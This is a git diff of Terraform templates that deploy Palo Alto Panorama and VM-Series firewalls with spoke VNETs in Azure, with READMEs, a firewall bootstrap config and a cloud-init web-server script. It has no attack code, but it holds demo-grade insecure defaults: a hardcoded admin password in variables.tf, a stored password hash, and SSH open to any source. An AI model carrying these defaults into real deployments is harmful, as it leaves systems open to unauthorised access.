(see above command for urn) +$ az vm image terms accept --urn paloaltonetworks:panorama:byol:8.1.2 + +# Download repo & change directories to the Terraform build +$ git clone https://github.com/wwce/terraform; cd terraform/azure/panorama_new_rg +``` + +### 2. Edit variables.tf or create terraform.tfvars +The variables.tf file contains default settings for the template. It may be edited to suit specific requirements or the file terraform.tfvars.sample can be used to create a terraform.tfvars file to override some or all settings. 
+ +Variable descriptions: + + virtualMachineRG = Name of resource group to create + + Location = Target Azure region + + virtualNetworkName = Virtual Network Name + + addressPrefix = VNet CIDR + + subnetName = Subnet name in the VNet + + subnet = Subnet CIDR + + publicIpAddressName = Panorama public IP address name + + networkInterfaceName = Panorama network interface name + + networkSecurityGroupName = Network Security Group (NSG) name + + diagnosticsStorageAccountName = Diagnostics Storage Account name + + diagnosticsStorageAccountTier = Diagnostics Storage Account tier + + diagnosticsStorageAccountReplication = Diagnostics Storage Account replication + + virtualMachineName = Panorama VM name + + virtualMachineSize = Panorama VM size + + panoramaVersion = Panorama Version + + adminUsername = Admin Username + + adminPassword = Admin Password + + +### 3. Deploy Build +``` +$ terraform init +$ terraform apply +``` + +
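The same two commands can also be driven from Python with the `python_terraform` wrapper that the other scripts in this repository (for example `deploy.py`) already use. The sketch below is illustrative only: it assumes it is run from the `terraform/azure` directory after `az login`, and the variable overrides shown are examples rather than required values.

```python
#!/usr/bin/env python3
# Illustrative sketch only: drive the panorama_new_rg build with python_terraform,
# mirroring the pattern used by deploy.py elsewhere in this repository.
# Assumptions: run from terraform/azure, python_terraform installed, az login done.
from python_terraform import Terraform

tf = Terraform(working_dir='./panorama_new_rg')
tf.cmd('init')

# Override a few defaults from variables.tf; anything omitted keeps its default.
panorama_vars = {
    'virtualMachineRG': 'panorama-rg',   # example name, not a required value
    'Location': 'centralus',
    'panoramaVersion': '8.1.2',
}

return_code, stdout, stderr = tf.apply(var=panorama_vars, skip_plan=True,
                                       capture_output=False,
                                       **{'auto-approve': True})
if return_code != 0:
    raise SystemExit('terraform apply failed')

# Print all template outputs, including the Panorama public IP from outputs.tf.
print(tf.output())
```

As in the Jenkins scripts, `auto-approve` is passed straight through as a Terraform CLI flag so the apply runs non-interactively.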
+ +## How to Destroy +Run the following to destroy the build. +``` +$ terraform destroy +``` + +
+ +## Support Policy +The guide in this directory and accompanied files are released under an as-is, best effort, support policy. These scripts should be seen as community supported and Palo Alto Networks will contribute our expertise as and when possible. We do not provide technical support or help in using or troubleshooting the components of the project through our normal support options such as Palo Alto Networks support teams, or ASC (Authorized Support Centers) partners and backline support options. The underlying product used (the VM-Series firewall) by the scripts or templates are still supported, but the support is only for the product functionality and not for help in deploying or using the template or script itself. +Unless explicitly tagged, all projects or work posted in our GitHub repository (at https://github.com/PaloAltoNetworks) or sites other than our official Downloads page on https://support.paloaltonetworks.com are provided under the best effort policy. diff --git a/azure/panorama_new_rg/interfaces.tf b/azure/panorama_new_rg/interfaces.tf new file mode 100644 index 00000000..f971b4e5 --- /dev/null +++ b/azure/panorama_new_rg/interfaces.tf @@ -0,0 +1,14 @@ +#### CREATE THE NETWORK INTERFACES #### + +resource "azurerm_network_interface" "panorama" { + name = "${var.networkInterfaceName}" + location = "${azurerm_resource_group.resourcegroup.location}" + resource_group_name = "${azurerm_resource_group.resourcegroup.name}" + ip_configuration { + name = "${var.networkInterfaceName}" + subnet_id = "${azurerm_subnet.panorama.id}" + private_ip_address_allocation = "Dynamic" + public_ip_address_id = "${azurerm_public_ip.panorama.id}" + } + depends_on = ["azurerm_public_ip.panorama"] +} \ No newline at end of file diff --git a/azure/panorama_new_rg/nsg.tf b/azure/panorama_new_rg/nsg.tf new file mode 100644 index 00000000..4e454d84 --- /dev/null +++ b/azure/panorama_new_rg/nsg.tf @@ -0,0 +1,32 @@ +resource "azurerm_network_security_group" "panorama" { + name = "${var.networkSecurityGroupName}" + resource_group_name = "${azurerm_resource_group.resourcegroup.name}" + location = "${azurerm_resource_group.resourcegroup.location}" + + security_rule { + name = "TCP-22" + priority = 100 + direction = "Inbound" + access = "Allow" + protocol = "*" + source_port_range = "*" + destination_port_range = "22" + source_address_prefix = "*" + destination_address_prefix = "${azurerm_network_interface.panorama.private_ip_address}" + } + security_rule { + name = "TCP-443" + priority = 110 + direction = "Inbound" + access = "Allow" + protocol = "*" + source_port_range = "*" + destination_port_range = "443" + source_address_prefix = "*" + destination_address_prefix = "${azurerm_network_interface.panorama.private_ip_address}" + } +} +resource "azurerm_subnet_network_security_group_association" "panorama" { + subnet_id = "${azurerm_subnet.panorama.id}" + network_security_group_id = "${azurerm_network_security_group.panorama.id}" +} \ No newline at end of file diff --git a/azure/panorama_new_rg/outputs.tf b/azure/panorama_new_rg/outputs.tf new file mode 100644 index 00000000..b23d093b --- /dev/null +++ b/azure/panorama_new_rg/outputs.tf @@ -0,0 +1,3 @@ +output "Panorama Public IP:" { + value = "${azurerm_public_ip.panorama.ip_address}" +} \ No newline at end of file diff --git a/azure/panorama_new_rg/panorama.tf b/azure/panorama_new_rg/panorama.tf new file mode 100644 index 00000000..4443ca98 --- /dev/null +++ b/azure/panorama_new_rg/panorama.tf @@ -0,0 +1,51 @@ +#### CREATE Panorama + +resource 
"azurerm_virtual_machine" "panorama" { + name = "${var.virtualMachineName}" + location = "${azurerm_resource_group.resourcegroup.location}" + resource_group_name = "${azurerm_resource_group.resourcegroup.name}" + network_interface_ids = + [ + "${azurerm_network_interface.panorama.id}", + ] + + primary_network_interface_id = "${azurerm_network_interface.panorama.id}" + vm_size = "${var.virtualMachineSize}" + + plan { + name = "byol" + publisher = "paloaltonetworks" + product = "panorama" + } + + storage_image_reference { + publisher = "paloaltonetworks" + offer = "panorama" + sku = "byol" + version = "${var.panoramaVersion}" + } + + storage_os_disk { + name = "${var.virtualMachineName}" + caching = "ReadWrite" + create_option = "FromImage" + managed_disk_type = "StandardSSD_LRS" + } + + delete_os_disk_on_termination = true + delete_data_disks_on_termination = true + + os_profile { + computer_name = "${var.virtualMachineName}" + admin_username = "${var.adminUsername}" + admin_password = "${var.adminPassword}" + } + + os_profile_linux_config { + disable_password_authentication = false + } + boot_diagnostics { + enabled = "true" + storage_uri = "${azurerm_storage_account.mystorageaccount.primary_blob_endpoint}" + } +} \ No newline at end of file diff --git a/azure/panorama_new_rg/public-ips.tf b/azure/panorama_new_rg/public-ips.tf new file mode 100644 index 00000000..09c1a7fc --- /dev/null +++ b/azure/panorama_new_rg/public-ips.tf @@ -0,0 +1,7 @@ +#### CREATE PUBLIC IP ADDRESSES #### +resource "azurerm_public_ip" panorama { + name = "${var.publicIpAddressName}" + location = "${azurerm_resource_group.resourcegroup.location}" + resource_group_name = "${azurerm_resource_group.resourcegroup.name}" + allocation_method = "Static" +} \ No newline at end of file diff --git a/azure/panorama_new_rg/resource-group.tf b/azure/panorama_new_rg/resource-group.tf new file mode 100644 index 00000000..bb71e2a6 --- /dev/null +++ b/azure/panorama_new_rg/resource-group.tf @@ -0,0 +1,10 @@ +//# ********** RESOURCE GROUP ********** +//# Configure the Providers +provider "azurerm" {} +provider "random" {} + +//# Create a resource group +resource "azurerm_resource_group" "resourcegroup" { + name = "${var.virtualMachineRG}" + location = "${var.Location}" +} \ No newline at end of file diff --git a/azure/panorama_new_rg/route-tables.tf b/azure/panorama_new_rg/route-tables.tf new file mode 100644 index 00000000..5d33ffa5 --- /dev/null +++ b/azure/panorama_new_rg/route-tables.tf @@ -0,0 +1,17 @@ +#### CREATE THE ROUTE TABLES #### + +resource "azurerm_route_table" "panorama" { + name = "panorama" + location = "${azurerm_resource_group.resourcegroup.location}" + resource_group_name = "${azurerm_resource_group.resourcegroup.name}" + route { + name = "internet" + address_prefix = "0.0.0.0/0" + next_hop_type = "internet" + } +} + +resource "azurerm_subnet_route_table_association" "panorama" { + subnet_id = "${azurerm_subnet.panorama.id}" + route_table_id = "${azurerm_route_table.panorama.id}" +} \ No newline at end of file diff --git a/azure/panorama_new_rg/storage-account.tf b/azure/panorama_new_rg/storage-account.tf new file mode 100644 index 00000000..a3034ff1 --- /dev/null +++ b/azure/panorama_new_rg/storage-account.tf @@ -0,0 +1,11 @@ +# Storage account for boot diagnostics +resource "random_id" "storage_account" { + byte_length = 4 +} +resource "azurerm_storage_account" "mystorageaccount" { + name = "${var.diagnosticsStorageAccountName}${lower(random_id.storage_account.hex)}" + location = 
"${azurerm_resource_group.resourcegroup.location}" + resource_group_name = "${azurerm_resource_group.resourcegroup.name}" + account_tier = "${var.diagnosticsStorageAccountTier}" + account_replication_type = "${var.diagnosticsStorageAccountReplication}" +} \ No newline at end of file diff --git a/azure/panorama_new_rg/terraform.tfvars.sample b/azure/panorama_new_rg/terraform.tfvars.sample new file mode 100644 index 00000000..7ce8eb6e --- /dev/null +++ b/azure/panorama_new_rg/terraform.tfvars.sample @@ -0,0 +1,33 @@ +virtualMachineRG = "" + +Location = "" + +virtualNetworkName = "" + +addressPrefix = "" + +subnetName = "" + +subnet = "" + +publicIpAddressName = "" + +networkInterfaceName = "" + +networkSecurityGroupName = "" + +diagnosticsStorageAccountName = "" + +diagnosticsStorageAccountTier = "" + +diagnosticsStorageAccountReplication = "" + +virtualMachineName = "" + +virtualMachineSize = "" + +panoramaVersion = "" + +adminUsername = "" + +adminPassword = "" \ No newline at end of file diff --git a/azure/panorama_new_rg/variables.tf b/azure/panorama_new_rg/variables.tf new file mode 100644 index 00000000..9456111b --- /dev/null +++ b/azure/panorama_new_rg/variables.tf @@ -0,0 +1,68 @@ +variable "virtualMachineRG" { + description = "Virtual Machine RG" + default = "pglynn-test" +} +variable "Location" { + description = "Location" + default = "centralus" +} +variable "virtualNetworkName" { + description = "Virtual Network Name" + default = "panorama" +} +variable "addressPrefix" { + description = "Address Prefix" + default = "10.0.0.0/24" +} +variable "subnetName" { + description = "Subnet Name" + default = "panorama" +} +variable "subnet" { + description = "Subnet" + default = "10.0.0.0/24" +} +variable "publicIpAddressName" { + description = "Public Ip Address Name" + default = "panorama" +} +variable "networkInterfaceName" { + description = "Network Interface Name" + default = "panorama" +} +variable "networkSecurityGroupName" { + description = "Network Security Group Name" + default = "panorama" +} +variable "diagnosticsStorageAccountName" { + description = "Diagnostics Storage Account Name" + default = "panorama" +} +variable "diagnosticsStorageAccountTier" { + description = "Diagnostics Storage Account Tier" + default = "Standard" +} +variable "diagnosticsStorageAccountReplication" { + description = "Diagnostics Storage Account Replication" + default = "LRS" +} +variable "virtualMachineName" { + description = "Virtual Machine Name" + default = "panorama" +} +variable "virtualMachineSize" { + description = "Virtual Machine Size" + default = "Standard_D3" +} +variable "panoramaVersion" { + description = "Panorama Version" + default = "8.1.2" +} +variable "adminUsername" { + description = "Admin Username" + default = "panadmin" +} +variable "adminPassword" { + description = "Admin Password" + default = "Pal0Alt0@123" +} \ No newline at end of file diff --git a/azure/panorama_new_rg/vnet-subnets.tf b/azure/panorama_new_rg/vnet-subnets.tf new file mode 100644 index 00000000..fba7b3cf --- /dev/null +++ b/azure/panorama_new_rg/vnet-subnets.tf @@ -0,0 +1,18 @@ +# ********** VNET ********** + +# Create a virtual network +resource "azurerm_virtual_network" "vnet" { + name = "${var.virtualNetworkName}" + address_space = ["${var.addressPrefix}"] + location = "${azurerm_resource_group.resourcegroup.location}" + resource_group_name = "${azurerm_resource_group.resourcegroup.name}" +} + +# Create the subnet + +resource "azurerm_subnet" "panorama" { + name = "${var.subnetName}" + resource_group_name 
= "${azurerm_resource_group.resourcegroup.name}" + virtual_network_name = "${azurerm_virtual_network.vnet.name}" + address_prefix = "${var.subnet}" +} \ No newline at end of file diff --git a/azure/transit_2fw_2spoke_common/GUIDE.pdf b/azure/transit_2fw_2spoke_common/GUIDE.pdf new file mode 100644 index 00000000..c66ebfe6 Binary files /dev/null and b/azure/transit_2fw_2spoke_common/GUIDE.pdf differ diff --git a/azure/transit_2fw_2spoke_common/README.md b/azure/transit_2fw_2spoke_common/README.md new file mode 100644 index 00000000..4c19611a --- /dev/null +++ b/azure/transit_2fw_2spoke_common/README.md @@ -0,0 +1,60 @@ +# 2 x VM-Series / Public LB / Internal LB / 2 x Spoke VNETs + +Terraform creates 2 VM-Series firewalls deployed in a transit VNET with two connected spoke VNETs (via VNET peering). The VM-Series firewalls secure all ingress/egress to and from the spoke VNETs. All traffic originating from the spokes is routed to an internal load balancer in the transit VNET's trust subnet. All inbound traffic from the internet is sent through a public load balancer. + +Please see the [**Deployment Guide**](https://github.com/wwce/terraform/blob/master/azure/transit_2fw_2spoke_common/GUIDE.pdf) for more information. + +
+ + +## Prerequisites +* Valid Azure Subscription +* Access to Azure Cloud Shell + +
+ +## How to Deploy +### 1. Setup & Download Build +In the Azure Portal, open Azure Cloud Shell and run the following commands (**BASH ONLY!**): +``` +# Accept VM-Series EULA for desired license type (BYOL, Bundle1, or Bundle2) +$ az vm image terms accept --urn paloaltonetworks:vmseries1::9.0.1 + +# Download repo & change directories to the Terraform build +$ git clone https://github.com/wwce/terraform; cd terraform/azure/transit_2fw_2spoke_common +``` + +### 2. Edit terraform.tfvars +Open terraform.tfvars and uncomment one value for fw_license that matches your license type from step 1. + +``` +$ vi terraform.tfvars +``` + +
+Your terraform.tfvars should then contain exactly one uncommented fw_license value (BYOL, Bundle1, or Bundle2) before proceeding. + +
+ +### 3. Deploy Build +``` +$ terraform init +$ terraform apply +``` + +
+ +## How to Destroy +Run the following to destroy the build. +``` +$ terraform destroy +``` + +
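The teardown can also be scripted in the same style as `destroy.py` in the Jenkins project, including removal of the local state files. This is only a sketch under the assumption that the build was applied from this directory; it is not part of the template.

```python
#!/usr/bin/env python3
# Illustrative sketch only: destroy the transit_2fw_2spoke_common build and clean up
# local Terraform state, loosely following the destroy.py pattern in this repository.
import os

from python_terraform import Terraform


def delete_state_files(working_dir, file_names):
    """Remove leftover Terraform state files, if present."""
    for name in file_names:
        path = os.path.join(working_dir, name)
        if os.path.exists(path):
            os.remove(path)
            print('Removed {}'.format(path))


tf = Terraform(working_dir='./transit_2fw_2spoke_common')
return_code, stdout, stderr = tf.cmd('destroy', capture_output=False,
                                     **{'auto-approve': True})
print('terraform destroy returned {}'.format(return_code))

if return_code == 0:
    delete_state_files('./transit_2fw_2spoke_common',
                       ['terraform.tfstate', 'terraform.tfstate.backup'])
```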
+ +## Support Policy +The guide in this directory and accompanied files are released under an as-is, best effort, support policy. These scripts should be seen as community supported and Palo Alto Networks will contribute our expertise as and when possible. We do not provide technical support or help in using or troubleshooting the components of the project through our normal support options such as Palo Alto Networks support teams, or ASC (Authorized Support Centers) partners and backline support options. The underlying product used (the VM-Series firewall) by the scripts or templates are still supported, but the support is only for the product functionality and not for help in deploying or using the template or script itself. +Unless explicitly tagged, all projects or work posted in our GitHub repository (at https://github.com/PaloAltoNetworks) or sites other than our official Downloads page on https://support.paloaltonetworks.com are provided under the best effort policy. diff --git a/azure/transit_2fw_2spoke_common/bootstrap_files/config/bootstrap.xml b/azure/transit_2fw_2spoke_common/bootstrap_files/config/bootstrap.xml new file mode 100644 index 00000000..47185aa0 --- /dev/null +++ b/azure/transit_2fw_2spoke_common/bootstrap_files/config/bootstrap.xml @@ -0,0 +1,1058 @@ + + + + + + + + + yes + no + yes + no + + + updates.paloaltonetworks.com + + + + + wednesday + 01:02 + download-only + + + + + US/Pacific + + yes + yes + + + + 8.8.8.8 + 4.2.2.2 + + + fw1 + + + + yes + + + FQDN + + fw1 + paloalto + + + yes + no + yes + no + + + 8.8.8.8 + 4.2.2.2 + + + + yes + + + + + + + + + + no + + allow-health-probe + + no + + + yes + no + + + + + + + + no + + allow-health-probe + + no + + + yes + no + + + + + + + + + + 3 + 5 + wait-recover + + + + + no + no + yes + no + no + no + no + no + no + no + no + + + + + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 + + + 8 + + + + + aes-128-cbc + + + sha256 + + + group19 + + + 8 + + + + + aes-256-cbc + + + sha384 + + + group20 + + + 8 + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 + + 1 + + + + + + aes-128-gcm + + + none + + + group19 + + 1 + + + + + + aes-256-gcm + + + none + + + group20 + + 1 + + + + + + + aes-128-cbc + + + sha1 + + + + + + + + + + + real-time + + + high + + + high + + + medium + + + medium + + + low + + + low + + + low + + + + + + + + + + no + + + 1.25 + 0.5 + 900 + 300 + 900 + yes + + + + + yes + + + + + no + + + no + + + no + + + + ethernet1/1 + + + 10 + 10 + 30 + 110 + 30 + 110 + 200 + 20 + 120 + + + + + + + 10.0.1.1 + + + None + + + no + any + 2 + + ethernet1/1 + 10 + 0.0.0.0/0 + + + + + + + trust-vr + + + None + + + no + any + 2 + + 10 + 10.1.0.0/16 + + + + + + + trust-vr + + + None + + + no + any + 2 + + 10 + 10.2.0.0/16 + + + + + + + + + + + + + + + + ethernet1/2 + + + 10 + 10 + 30 + 110 + 30 + 110 + 200 + 20 + 120 + + + + + + + 10.0.2.1 + + + None + + + no + any + 2 + + ethernet1/2 + 10 + 168.63.129.16/32 + + + + + + + untrust-vr + + + None + + + no + any + 2 + + 10 + 0.0.0.0/0 + + + + + + + 10.0.2.1 + + + None + + + no + any + 2 + + ethernet1/2 + 10 + 10.1.0.0/16 + + + + + + + 10.0.2.1 + + + None + + + no + any + 2 + + ethernet1/2 + 10 + 10.2.0.0/16 + + + + + + + + + + + + + + + + + yes + + + no + + + no + + + no + + + no + + + + + + + + + + + + ethernet1/2 + + + no + + + + + ethernet1/1 + + + no + + + + + + ethernet1/2 + ethernet1/1 + vlan + loopback + tunnel + + + + untrust-vr + trust-vr + + + + + + + + + + + 22 + + + + + + + + + + + + + + + any + + + any + + + azure-lb-probe + + + any + + + any + + + 
any + + + any + + + any + + + any + + allow + + + + trust + + + untrust + + + any + + + any + + + any + + + any + + + web-browsing + + + application-default + + + any + + allow + + + + trust + + + untrust + + + any + + + any + + + any + + + any + + + ssh + + + application-default + + + any + + allow + + + universal + + trust + + + trust + + + spoke1-vnet + spoke2-vnet + + no + + any + + + any + + + spoke1-vnet + spoke2-vnet + + no + + ping + ssh + web-browsing + + + application-default + + + any + + allow + no + yes + no + no + + + + universal + + trust + + + untrust + + + spoke1-vnet + spoke2-vnet + + no + + any + + + any + + + any + + no + + apt-get + ntp + ping + ssl + web-browsing + + + application-default + + + any + + allow + no + yes + no + no + + + + + + + + deny + no + yes + + + deny + no + yes + + + + + + + + + + + + + + + + + + + ipv4 + + untrust + + + untrust + + any + any + + azure-lb-probe + + + any + + no + This NAT policy prevents the public load balancer's health probes from being NATed. + + + ipv4 + + untrust + + + untrust + + ethernet1/1 + service-http + + any + + + any + + no + + + + ethernet1/2 + + + + + spoke1-intlb + 80 + + NATs inbound request to internal LB in spoke1 + + + ipv4 + + untrust + + + untrust + + ethernet1/1 + tcp-22 + + any + + + any + + no + + + + ethernet1/2 + + + + + spoke2-vm + 22 + + NATs inbound request to jump server in Spoke 1. + + + ipv4 + + trust + + + untrust + + any + any + + any + + + any + + + + + ethernet1/1 + + + + no + + + + + + + + + + + + + +
+ + 168.63.129.16/32 + + azure-resource + + + + 10.1.0.4 + + azure-resource + + + + 10.2.0.4 + + azure-resource + + + + 10.1.0.0/16 + + azure-resource + + + + 10.2.0.0/16 + + azure-resource + + + + 10.1.0.100 + + azure-resource + + +
+ + + + + + + + + + color20 + + + color13 + + + color24 + + + color22 + + + + + + + + + + + + + + + + + + + + + + + + +
+
+
+
+ + + + * + + + yes + + + + + $1$uoktdfcd$ETFyCMQoc9Atk1GyysHYU1 + + + yes + + + + + + yes + 8 + + + + + + + + + + + + + + + + + + + yes + 5 + + + yes + 5 + + + yes + 5 + + + yes + 10 + + + yes + 5 + + + + yes + + + + 10 + 10 + + 100 + 50 + + + + 10 + 10 + + 100 + 50 + + + + + + 100 + yes + + + + + + +
diff --git a/gcp/gcp-terraform-mclimans/demo_deployments/two_tier/bootstrap/init-cfg.txt b/azure/transit_2fw_2spoke_common/bootstrap_files/config/init-cfg.txt similarity index 80% rename from gcp/gcp-terraform-mclimans/demo_deployments/two_tier/bootstrap/init-cfg.txt rename to azure/transit_2fw_2spoke_common/bootstrap_files/config/init-cfg.txt index 840154aa..44878949 100644 --- a/gcp/gcp-terraform-mclimans/demo_deployments/two_tier/bootstrap/init-cfg.txt +++ b/azure/transit_2fw_2spoke_common/bootstrap_files/config/init-cfg.txt @@ -4,6 +4,6 @@ default-gateway= netmask= ipv6-address= ipv6-default-gateway= -hostname=vm-series +dhcp-accept-server-hostname=yes dns-primary=8.8.8.8 dns-secondary=4.2.2.2 \ No newline at end of file diff --git a/azure/transit_2fw_2spoke_common/bootstrap_files/content/.gitignore b/azure/transit_2fw_2spoke_common/bootstrap_files/content/.gitignore new file mode 100644 index 00000000..c96a04f0 --- /dev/null +++ b/azure/transit_2fw_2spoke_common/bootstrap_files/content/.gitignore @@ -0,0 +1,2 @@ +* +!.gitignore \ No newline at end of file diff --git a/azure/transit_2fw_2spoke_common/bootstrap_files/license/authcodes b/azure/transit_2fw_2spoke_common/bootstrap_files/license/authcodes new file mode 100644 index 00000000..e69de29b diff --git a/azure/transit_2fw_2spoke_common/bootstrap_files/software/.gitignore b/azure/transit_2fw_2spoke_common/bootstrap_files/software/.gitignore new file mode 100644 index 00000000..c96a04f0 --- /dev/null +++ b/azure/transit_2fw_2spoke_common/bootstrap_files/software/.gitignore @@ -0,0 +1,2 @@ +* +!.gitignore \ No newline at end of file diff --git a/azure/transit_2fw_2spoke_common/fw_common.tf b/azure/transit_2fw_2spoke_common/fw_common.tf new file mode 100644 index 00000000..2f261ad5 --- /dev/null +++ b/azure/transit_2fw_2spoke_common/fw_common.tf @@ -0,0 +1,121 @@ +#----------------------------------------------------------------------------------------------------------------- +# Create resource group for FWs, FW NICs, and FW LBs + +resource "azurerm_resource_group" "common_fw" { + name = "${var.global_prefix}${var.fw_prefix}-rg" + location = var.location +} + +#----------------------------------------------------------------------------------------------------------------- +# Create storage account and file share for bootstrapping + +resource "random_string" "main" { + length = 15 + min_lower = 5 + min_numeric = 10 + special = false +} + +resource "azurerm_storage_account" "main" { + name = random_string.main.result + account_tier = "Standard" + account_replication_type = "LRS" + location = azurerm_resource_group.common_fw.location + resource_group_name = azurerm_resource_group.common_fw.name +} + +module "common_fileshare" { + source = "./modules/azure_bootstrap/" + name = "${var.fw_prefix}-bootstrap" + quota = 1 + storage_account_name = azurerm_storage_account.main.name + storage_account_key = azurerm_storage_account.main.primary_access_key + local_file_path = "bootstrap_files/" +} + + +#----------------------------------------------------------------------------------------------------------------- +# Create VM-Series. For every fw_name entered, an additional VM-Series instance will be deployed. 
+ +module "common_fw" { + source = "./modules/vmseries/" + name = "${var.fw_prefix}-vm" + vm_count = var.fw_count + username = var.fw_username + password = var.fw_password + panos = var.fw_panos + license = var.fw_license + nsg_prefix = var.fw_nsg_prefix + avset_name = "${var.fw_prefix}-avset" + subnet_mgmt = module.vnet.vnet_subnets[0] + subnet_untrust = module.vnet.vnet_subnets[1] + subnet_trust = module.vnet.vnet_subnets[2] + nic0_public_ip = true + nic1_public_ip = true + nic2_public_ip = false + nic1_backend_pool_ids = [module.common_extlb.backend_pool_id] + nic2_backend_pool_ids = [module.common_intlb.backend_pool_id] + bootstrap_storage_account = azurerm_storage_account.main.name + bootstrap_access_key = azurerm_storage_account.main.primary_access_key + bootstrap_file_share = module.common_fileshare.file_share_name + bootstrap_share_directory = "None" + location = var.location + resource_group_name = azurerm_resource_group.common_fw.name + + dependencies = [ + module.common_fileshare.completion + ] +} + +#----------------------------------------------------------------------------------------------------------------- +# Create public load balancer. Load balancer uses firewall's untrust interfaces as its backend pool. + +module "common_extlb" { + source = "./modules/lb/" + name = "${var.fw_prefix}-public-lb" + type = "public" + sku = "Standard" + probe_ports = [22] + frontend_ports = [80, 22, 443] + backend_ports = [80, 22, 443] + protocol = "Tcp" + location = var.location + resource_group_name = azurerm_resource_group.common_fw.name +} + +#----------------------------------------------------------------------------------------------------------------- +# Create internal load balancer. Load balancer uses firewall's trust interfaces as its backend pool + +module "common_intlb" { + source = "./modules/lb/" + name = "${var.fw_prefix}-internal-lb" + type = "private" + sku = "Standard" + probe_ports = [22] + frontend_ports = [0] + backend_ports = [0] + protocol = "All" + subnet_id = module.vnet.vnet_subnets[2] + private_ip_address = var.fw_internal_lb_ip + location = var.location + resource_group_name = azurerm_resource_group.common_fw.name +} + +#----------------------------------------------------------------------------------------------------------------- +# Outputs to terminal + +output EXT-LB { + value = "http://${module.common_extlb.public_ip[0]}" +} + +output MGMT-FW1 { + value = "https://${module.common_fw.nic0_public_ip[0]}" +} + +output MGMT-FW2 { + value = "https://${module.common_fw.nic0_public_ip[1]}" +} + +output SSH-TO-SPOKE2 { + value = "ssh ${var.spoke_username}@${module.common_extlb.public_ip[0]}" +} diff --git a/azure/transit_2fw_2spoke_common/fw_vnet.tf b/azure/transit_2fw_2spoke_common/fw_vnet.tf new file mode 100644 index 00000000..826b7152 --- /dev/null +++ b/azure/transit_2fw_2spoke_common/fw_vnet.tf @@ -0,0 +1,16 @@ +#----------------------------------------------------------------------------------------------------------------- +# Create Transit VNET +resource "azurerm_resource_group" "transit" { + name = "${var.global_prefix}${var.transit_prefix}-rg" + location = var.location +} + +module "vnet" { + source = "./modules/vnet/" + name = "${var.transit_prefix}-vnet" + address_space = var.transit_vnet_cidr + subnet_names = var.transit_subnet_names + subnet_prefixes = var.transit_subnet_cidrs + location = var.location + resource_group_name = azurerm_resource_group.transit.name +} diff --git a/azure/transit_2fw_2spoke_common/images/diagram.png 
b/azure/transit_2fw_2spoke_common/images/diagram.png new file mode 100644 index 00000000..45f1d146 Binary files /dev/null and b/azure/transit_2fw_2spoke_common/images/diagram.png differ diff --git a/azure/transit_2fw_2spoke_common/images/tfvars.png b/azure/transit_2fw_2spoke_common/images/tfvars.png new file mode 100644 index 00000000..afd57343 Binary files /dev/null and b/azure/transit_2fw_2spoke_common/images/tfvars.png differ diff --git a/azure/transit_2fw_2spoke_common/modules/azure_bootstrap/main.tf b/azure/transit_2fw_2spoke_common/modules/azure_bootstrap/main.tf new file mode 100644 index 00000000..1a5c1f7a --- /dev/null +++ b/azure/transit_2fw_2spoke_common/modules/azure_bootstrap/main.tf @@ -0,0 +1,40 @@ + + +resource "random_string" "randomstring" { + length = 15 + min_lower = 5 + min_numeric = 10 + special = false +} + +resource "azurerm_storage_share" "main" { + name = "${var.name}${random_string.randomstring.result}" + storage_account_name = var.storage_account_name + quota = var.quota +} + +resource "null_resource" "upload" { +provisioner "local-exec" { + command = < + SOURCE & DESTINATION ADDRESSES +
'; +echo ''. "INTERVAL" .': '. $time .'
'; +$localIPAddress = getHostByName(getHostName()); +$sourceIPAddress = getRealIpAddr(); +echo ''. "SOURCE IP" .': '. $sourceIPAddress .'
'; +echo ''. "LOCAL IP" .': '. $localIPAddress .'
'; + +$vm_name = gethostname(); +echo ''. "VM NAME" .': '. $vm_name .'
'; +echo ''. '
'; +echo ' + HEADER INFORMATION +
'; +/* All $_SERVER variables prefixed with HTTP_ are the HTTP headers */ +foreach ($_SERVER as $header => $value) { + if (substr($header, 0, 5) == 'HTTP_') { + /* Strip the HTTP_ prefix from the $_SERVER variable, what remains is the header */ + $clean_header = strtolower(substr($header, 5, strlen($header))); + + /* Replace underscores by the dashes, as the browser sends them */ + $clean_header = str_replace('_', '-', $clean_header); + + /* Cleanup: standard headers are first-letter uppercase */ + $clean_header = ucwords($clean_header, " \t\r\n\f\v-"); + + /* And show'm */ + echo ''. $header .': '. $value .'
'; + } +} +?> diff --git a/azure/transit_2fw_2spoke_common/scripts/web_startup.yml.tpl b/azure/transit_2fw_2spoke_common/scripts/web_startup.yml.tpl new file mode 100644 index 00000000..1d02e945 --- /dev/null +++ b/azure/transit_2fw_2spoke_common/scripts/web_startup.yml.tpl @@ -0,0 +1,10 @@ +#cloud-config + +runcmd: + - sudo apt-get update -y + - sudo apt-get install -y php + - sudo apt-get install -y apache2 + - sudo apt-get install -y libapache2-mod-php + - sudo rm -f /var/www/html/index.html + - sudo wget -O /var/www/html/index.php https://raw.githubusercontent.com/wwce/terraform/master/azure/transit_2fw_2spoke_common/scripts/showheaders.php + - sudo systemctl restart apache2 \ No newline at end of file diff --git a/azure/transit_2fw_2spoke_common/spokes.tf b/azure/transit_2fw_2spoke_common/spokes.tf new file mode 100644 index 00000000..ea6ab06c --- /dev/null +++ b/azure/transit_2fw_2spoke_common/spokes.tf @@ -0,0 +1,97 @@ +#----------------------------------------------------------------------------------------------------------------- +# Create spoke1 resource group, spoke1 VNET, spoke1 internal LB, (2) spoke1 VMs + +resource "azurerm_resource_group" "spoke1_rg" { + name = "${var.global_prefix}${var.spoke1_prefix}-rg" + location = var.location +} + +module "spoke1_vnet" { + source = "./modules/spoke_vnet/" + name = "${var.spoke1_prefix}-vnet" + address_space = var.spoke1_vnet_cidr + subnet_prefixes = var.spoke1_subnet_cidrs + remote_vnet_rg = azurerm_resource_group.transit.name + remote_vnet_name = module.vnet.vnet_name + remote_vnet_id = module.vnet.vnet_id + route_table_destinations = var.spoke_udrs + route_table_next_hop = [var.fw_internal_lb_ip] + location = var.location + resource_group_name = azurerm_resource_group.spoke1_rg.name +} + +data "template_file" "web_startup" { + template = "${file("${path.module}/scripts/web_startup.yml.tpl")}" +} + +module "spoke1_vm" { + source = "./modules/spoke_vm/" + name = "${var.spoke1_prefix}-vm" + vm_count = var.spoke1_vm_count + subnet_id = module.spoke1_vnet.vnet_subnets[0] + availability_set_id = "" + backend_pool_ids = [module.spoke1_lb.backend_pool_id] + custom_data = base64encode(data.template_file.web_startup.rendered) + publisher = "Canonical" + offer = "UbuntuServer" + sku = "16.04-LTS" + username = var.spoke_username + password = var.spoke_password + tags = var.tags + location = var.location + resource_group_name = azurerm_resource_group.spoke1_rg.name +} + +module "spoke1_lb" { + source = "./modules/lb/" 